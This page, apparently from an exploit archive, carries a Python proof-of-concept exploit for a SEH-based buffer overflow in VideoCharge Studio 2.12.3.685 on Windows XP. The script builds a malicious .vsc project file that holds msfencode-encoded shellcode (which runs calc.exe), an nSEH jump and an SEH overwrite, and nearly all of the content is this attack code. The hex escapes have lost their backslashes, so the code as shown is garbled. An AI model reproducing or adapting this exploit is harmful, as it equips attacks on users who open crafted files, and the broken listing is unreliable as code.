Home / exploitsPDF  

VideoCharge Studio SEH Buffer Overflow

Posted on 28 October 2013

#!/usr/bin/python
# Exploit Title: VideoCharge Studio SEH Buffer Overflow 
# Date found: 27.10.2013
# Exploit Author: metacom
# URL: http://www.videocharge.com/download.php
# Software Link: www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: 2.12.3.685
# Tested on: Windows XP SP2 
# Poc demo:http://bit.ly/1axkW74
import struct
head=("x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22"
"x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x57x69x6Ex64x6Fx77x73x2Dx31x32"
"x35x32x22x20x3Fx3Ex3Cx63x6Fx6Ex66x69x67x20x76x65x72x3Dx22x32x2E"
"x31x32x2Ex33x2Ex36x38x35x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6D"
"x65x3Dx22x46x69x6Cx65x73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61"
"x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x73x22x3Ex0Ax0Ax3Cx50x72x6Fx70"
"x65x72x74x79x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x22x3Ex0A"
"x0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x46x6Fx72x6Dx61x74x73x22"
"x3Ex0Ax0Ax3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x53x74"
"x72x65x61x6Dx22x3Ex0Ax0Ax3Cx56x61x6Cx75x65x20x6Ex61x6Dx65x3Dx22"
"x4Ex61x6Dx65x22x20x74x79x70x65x3Dx22x38x22x20x76x61x6Cx75x65x3Dx22")
 
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai 
#-b 'x00x0ax0dx3cx22x26' -t c
shellcode = ("xbbx80xa3x02xb2xdaxccxd9x74x24xf4x5ex31xc9xb1"
"x33x31x5ex12x03x5ex12x83x6ex5fxe0x47x92x48x6c"
"xa7x6ax89x0fx21x8fxb8x1dx55xc4xe9x91x1dx88x01"
"x59x73x38x91x2fx5cx4fx12x85xbax7exa3x2bx03x2c"
"x67x2dxffx2exb4x8dx3exe1xc9xccx07x1fx21x9cxd0"
"x54x90x31x54x28x29x33xbax27x11x4bxbfxf7xe6xe1"
"xbex27x56x7dx88xdfxdcxd9x29xdex31x3ax15xa9x3e"
"x89xedx28x97xc3x0ex1bxd7x88x30x94xdaxd1x75x12"
"x05xa4x8dx61xb8xbfx55x18x66x35x48xbaxedxedxa8"
"x3bx21x6bx3ax37x8exffx64x5bx11xd3x1ex67x9axd2"
"xf0xeexd8xf0xd4xabxbbx99x4dx11x6dxa5x8exfdxd2"
"x03xc4xefx07x35x87x65xd9xb7xbdxc0xd9xc7xbdx62"
"xb2xf6x36xedxc5x06x9dx4ax39x4dxbcxfaxd2x08x54"
"xbfxbexaax82x83xc6x28x27x7bx3dx30x42x7ex79xf6"
"xbexf2x12x93xc0xa1x13xb6xa2x24x80x5ax0bxc3x20"
"xf8x53")
 
junk = 824
buffer= "x41" * (junk - len(shellcode))
shellcode= shellcode
nseh= "xEBx06x90x90"
seh= struct.pack("<L",0x61B811F1)
jump="xe9x3fxfdxffxff"
 
end=("x22x2Fx3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2F"
"x63x6Fx6Cx73x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x52x6F"
"x6Dx61x6Ex69x61x20x53x65x63x75x72x69x74x79x20x54x65x61x6Dx22x2F"
"x3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2Fx63x6Fx6C"
"x73x3Ex0Ax0Ax3Cx2Fx63x6Fx6Ex66x69x67x3E")
 
off = head + buffer + shellcode + nseh + seh + jump + end
 
try:
        out_file = open("POC.vsc",'w')
        out_file.write(off)
        out_file.close()
        print("[*] Malicious vsc file created successfully")
except:
        print "[!] Error creating file"

 

TOP

Malware :

Exploits :